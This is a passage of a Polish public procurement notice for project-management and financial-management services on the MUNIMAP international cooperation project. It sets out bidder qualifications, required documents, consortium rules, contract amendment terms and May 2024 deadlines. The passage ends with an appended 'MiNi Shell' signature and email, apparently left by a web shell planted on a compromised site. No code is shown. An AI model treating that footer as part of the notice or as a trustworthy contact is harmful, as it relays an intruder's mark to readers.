sytuacji ekonomicznej lub finansowej – w zakresie posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 200.000,00 zł;<br/>4)	zdolności technicznej lub zawodowej <br/>a)	w postaci należytego wykonania, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywania, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – to w tym okresie:<br/>	co najmniej dwóch usług polegających na zarządzaniu lub koordynacji projektu, zawierających każda w swym zakresie wykonywanie zadań komunikacyjnych, wykonywanych dla lidera projektu lub partnera wiodącego w ramach projektu z zakresu współpracy międzynarodowej oraz<br/>	co najmniej dwóch usług polegających na zarządzaniu finansowym projektem, zawierających każda w swym zakresie wykonywanie zadań rozliczania finansowania, wykonywanych dla lidera projektu lub partnera wiodącego w ramach projektu z zakresu współpracy o całkowitej wartości każdego z projektów minimum 1,5 miliona euro; <br/>b)	w postaci dysponowania przez Wykonawcę następującymi osobami:<br/>	1 osobą posiadającą co najmniej 5-letnie doświadczenie w realizacji zadań polegających na zarządzaniu lub koordynacji projektu/projektów, w tym co najmniej w 1 zakończonym projekcie, zawierającym w swym zakresie wykonywanie zadań komunikacyjnych, wykonywanych dla lidera projektu lub partnera wiodącego w ramach projektu z zakresu współpracy międzynarodowej, władającą biegle językiem polskim oraz władającą biegle językiem angielskim,<br/>	1 osobą posiadającą co najmniej 5-letnie doświadczenie w realizacji zadań polegających na zarządzaniu finansowym projektem, w tym co najmniej w 1 zakończonym projekcie, zawierającym w swym zakresie wykonywanie zadań rozliczania finansowania, wykonywanych dla lidera projektu lub partnera wiodącego w ramach projektu z zakresu współpracy międzynarodowej, władającą biegle językiem polskim oraz władającą biegle językiem angielskim.<br/>Uwaga!<br/>1)	W przypadku, gdy wartość sumy gwarancyjnej będzie wyrażona w walucie innej niż PLN, Zamawiający do oceny spełniania warunku sytuacji ekonomicznej lub finansowej przeliczy podaną wartość po średnim kursie tej waluty w stosunku do PLN publikowanym przez NBP obowiązującym w dniu otwarcia ofert (wskazanym w ust. 1 rozdziału XVI SWZ).<br/>2)	W przypadku, gdy wartość projektu będzie wyrażona w walucie innej niż euro, Zamawiający przeliczy wartość projektu z danej waluty na PLN, a następnie z PLN na EURO po średnim kursie publikowanym przez NBP obowiązującym w dniu otwarcia ofert (wskazanym w ust. 1 rozdziału XVI SWZ).<br/>3)	Przez projekt z zakresu współpracy międzynarodowej należy rozumieć projekt charakteryzujący się uczestnictwem minimum trzech podmiotów z różnych państw, realizujących wspólne cele i działania, dofinansowany ze środków zorganizowanego program.<br/>4)	W odniesieniu do warunku należytego wykonania usług, o którym mowa w pkt 4) lit. a), warunek może zostać spełniony poprzez wykazanie wykonania/wykonywania usług polegających jednocześnie na zarządzaniu lub koordynacji projektu i zarządzaniu finansowym projektem, jak również poprzez wykazanie wykonania/wykonywania osobno usług polegających na zarządzaniu lub koordynacji projektem i usług polegających na zarządzaniu finansowym projektem. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia, Zamawiający wymaga złożenia następujących podmiotowych środków dowodowych:<br/>1)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 594), z innym wykonawcą, który złożył odrębną ofertę; albo oświadczenia o przynależności do tej samej grupy kapitałowej (sporządzonego zgodnie ze wzorem stanowiącym Załącznik nr 5 do SWZ) wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>2)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, Zamawiający wymaga złożenia następujących podmiotowych środków dowodowych:<br/>1)	dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia;<br/>2)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane (sporządzonego zgodnie ze wzorem stanowiącym Załącznik nr 4 do SWZ), oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>3)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (sporządzonego zgodnie ze wzorem stanowiącym Załącznik nr 3 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	wypełniony Formularz ofertowy – przygotowany zgodnie z wzorem stanowiącym Załącznik nr 1 do SWZ;<br/>3)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – w celu wykazania kryteriów oceny ofert - przygotowany zgodnie ze wzorem stanowiącym Załącznik nr 3 do SWZ;<br/>4)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru - w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, z zastrzeżeniem ust. 3 poniżej; <br/>5)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy - jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w ust. 1 pkt 4) powyżej; <br/>6)	w przypadku wspólnego ubiegania się o realizację zamówienia – pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego;<br/>7)	w przypadku wspólnego ubiegania się o realizację zamówienia – oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, z którego wynika, które usługi wykonają poszczególni Wykonawcy - sporządzone zgodnie ze wzorem stanowiącym Załącznik nr 6 do SWZ;<br/>8)	w przypadku polegania na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotu trzeciego – zobowiązanie podmiotu trzeciego lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, o którym mowa w art. 118 ust. 3 ustawy Pzp;<br/>9)	w przypadku polegania na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotu trzeciego – oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, o którym mowa w art. 125 ust. 5 ustawy Pzp – sporządzone zgodnie ze wzorem stanowiącym Załącznik nr 2.2 do SWZ;<br/>10)	informację, że wybór oferty Wykonawcy będzie prowadził do powstania u Zamawiającego obowiązku podatkowego, w sytuacji, o której mowa w art. 225 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy ci ponoszą solidarną odpowiedzialność za<br/>wykonanie umowy.<br/>2. Zapisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (np. konsorcjum, spółka cywilna):<br/>1) oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp (o którym mowa w rozdziale X ust. 1 pkt 2) SWZ), składa<br/>każdy z Wykonawców (oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu),<br/>2) podmiotowe środki dowodowe określone w rozdziale IX ust. 3 SWZ (odnoszące się do warunków udziału w<br/>postępowaniu) mogą być złożone wspólnie w imieniu wszystkich podmiotów składających ofertę wspólną,<br/>3) podmiotowe środki dowodowe, o których mowa w rozdziale IX ust. 7 SWZ (odnoszące się do podstaw wykluczenia),<br/>powinny być złożone przez każdego z Wykonawców,<br/>4) formularze winny być złożone w imieniu wszystkich podmiotów składających ofertę wspólną.<br/>4. Oferty składane przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółkę cywilną)<br/>w odniesieniu do warunków udziału w postępowaniu, o których mowa w rozdziale VI ust. 2 SWZ, i pozostałych wymagań<br/>określonych w SWZ zostaną ocenione pod kątem łącznego spełniania wymagań Zamawiającego przez występujących<br/>wspólnie Wykonawców, na podstawie złożonych przez nich oświadczeń i dokumentów.<br/>5. Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (tworzących konsorcjum lub będących<br/>wspólnikami spółki cywilnej) oddzielnie musi wykazać, iż nie podlega wykluczeniu z postępowania.<br/>6. Oferty przedstawione przez dwa lub więcej podmiotów występujących wspólnie, będą musiały spełniać następujące<br/>wymagania:<br/>1) w przypadku złożenia oferty wspólnej, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,<br/>2) oferta będzie podpisana w taki sposób, by wiązała prawnie wszystkich partnerów/wspólników,<br/>3) każdy Wykonawca przedłoży tylko jedną ofertę, sam lub jako partner w konsorcjum (wspólnik spółki cywilnej);<br/>Wykonawca, który przedkłada lub partycypuje w więcej niż jednej ofercie spowoduje, że wszystkie oferty z udziałem tego<br/>Wykonawcy zostaną odrzucone.<br/>7. W przypadku gdyby wyłoniona w prowadzonym postępowaniu oferta została złożona przez dwóch lub więcej<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, Zamawiający może zażądać przed<br/>zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. Termin, na<br/>jaki została zawarta umowa Wykonawców, nie może być krótszy od terminu określonego na wykonanie zamówienia.<br/>8. Zgodnie z art. 117 ust. 3 ustawy Pzp w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>9. W przypadku, o którym mowa w ust. 8 powyżej, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy (wzór oświadczenia stanowi<br/>Załącznik nr 6 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 3. Na podstawie art. 455 ust. 1 pkt 1) ustawy Pzp Zamawiający przewiduje możliwość następujących zmian umowy: w<br/>zakresie terminu realizacji umowy, sposobu wykonania umowy, przedmiotu zamówienia, wynagrodzenia, płatności,<br/>oznaczenia stron, i których konieczność wprowadzenia wynikać będzie z następujących okoliczności:<br/>1) zmiany określające sposób wykonania usługi – w przypadku, w którym służyć to będzie podniesieniu standardu<br/>wykonania przedmiotu zamówienia, dostosowania do potrzeb Zamawiającego lub potrzeb Projektu lub wynikające z<br/>czynników zewnętrznych i nie będzie to wykraczało poza określenie przedmiotu zamówienia zawarte w SWZ ani nie<br/>zwiększy wynagrodzenia Wykonawcy,<br/>2) zmiana dotycząca przedmiotu zamówienia, jego zakresu, wynagrodzenia Wykonawcy, jego rozliczenia oraz obowiązków<br/>Wykonawcy – w przypadku wystąpienia okoliczności nie przewidzianych w chwili zawarcia umowy, a skutkujących<br/>koniecznością ograniczenia przez Zamawiającego zakresu zleconego przedmiotu zamówienia,<br/>3) zmiany dotyczące zakresu przedmiotu zamówienia oraz wynagrodzenia, waluty wynagrodzenia – w przypadku, gdy<br/>wystąpi możliwość wykonania przedmiotu zamówienia w sposób inny od przewidzianego w SWZ, a zarazem korzystny dla<br/>Zamawiającego, zgodny z Projektem, nie będzie to wykraczało poza określenie przedmiotu zamówienia zawarte w SWZ ani<br/>nie zwiększy wynagrodzenia Wykonawcy,<br/>4) zmiana dotycząca terminu, warunków lub sposobu wykonania przedmiotu zamówienia – w przypadku zaistnienia siły<br/>wyższej, o której mowa w § 16 niniejszej umowy - zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień<br/>umowy do zaistniałego stanu prawnego lub faktycznego;<br/>5) zmiana terminu wykonania umowy - w wypadku przedłużenia się terminu zakończenia realizacji Projektu;<br/>6) zmiany w oznaczeniu stron – w przypadku wystąpienia zmian w nazwach lub adresach stron, zmian związanych z<br/>przekształceniem podmiotowym stron;<br/>7) zmiany umowy są konieczne w związku ze zmianą odpowiednich przepisów prawa, mających wpływ na przedmiot<br/>zamówienia – w zakresie wynikającym z tych zmian,<br/>8) zmiany umowy są konieczne na skutek działania organów administracji lub instytucji upoważnionych do wydania decyzji<br/>albo innych aktów władczych lub nadzorczych, nakazów instytucji kontrolnych, związanych z realizacją przedmiotu umowy –<br/>w zakresie wynikającym z tej zmiany;<br/>9) zmiana wysokości wynagrodzenia – w przypadku zmiany:<br/>a) stawki podatku od towarów i usług,<br/>b) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie<br/>przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenia społeczne lub zdrowotne,<br/>d) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4<br/>października 2018 r. o pracowniczych planach kapitałowych<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę;<br/>10) zmiana wysokości wynagrodzenia Wykonawcy – w przypadku zmiany kosztów związanych z realizacją zamówienia, o<br/>której mowa w art. 439 ustawy Pzp, w sytuacji i na warunkach określonych w § 15 ust. 14 - 15 projektu umowy.<br/>Szczegółowe zapisy dotyczące przewidywanych zmian umowy zawarte są w Załączniku nr 7 do SWZ, paragraf 15. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-16 09:50</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski” na Platformie e-Zamówienia, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-16 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający na podstawie art. 95 ust. 1 ustawy Pzp wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na<br/>podstawie stosunku pracy osób, o których mowa w rozdziale III ust. 4 SWZ, to jest osób wykonujących czynności wskazane<br/>w rozdziale III ust. 5 i 6 SWZ. Wymóg zatrudnienia ww. osób na podstawie umowy o pracę nie dotyczy osób wykonujących<br/>powyższe czynności będących wspólnikami spółki osobowej i/lub osób fizycznych prowadzących działalność gospodarczą<br/>(w tym wspólników spółki cywilnej).<br/>2. Przedmiot zamówienia realizowany będzie od dnia podpisania umowy do dnia 01.06.2027 r., czyli przewidywanego<br/>terminu zakończenia projektu MUNIMAP, sporządzenia raportu końcowego z jego realizacji oraz zaakceptowania raportu<br/>końcowego przez MA/JS (Managing Authority / Joint Secretariat).<br/>3. Poza przypadkami wymagającymi osobistego udziału przedstawiciela Wykonawcy w spotkaniach Komitetu Sterującego<br/>Projektem, spotkaniach w siedzibie Zamawiającego oraz realizacji warsztatów na spotkaniach Partnerów Projektu i<br/>warsztatów dla grup docelowych Projektu na terenie państw macierzystych Partnerów Projektu, włączając spotkania<br/>hybrydowe, Zamawiający dopuszcza realizację przedmiotu zamówienia w biurze Wykonawcy i kontaktowanie się z<br/>Zamawiającym telefonicznie, jak również za pośrednictwem poczty elektronicznej i interaktywnych spotkań online.<br/>4. Z postępowania o udzielenie zamówienia wykluczeni zostaną Wykonawcy podlegający wykluczeniu na podstawie art. 108<br/>ust. 1 oraz art. 109 ust. 1 pkt 1 i 4 ustawy Pzp , a także na podstawie art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (t.j. Dz.U. z 2024 r. poz. 507).

Creat By MiNi SheLL
Email: jattceo@gmail.com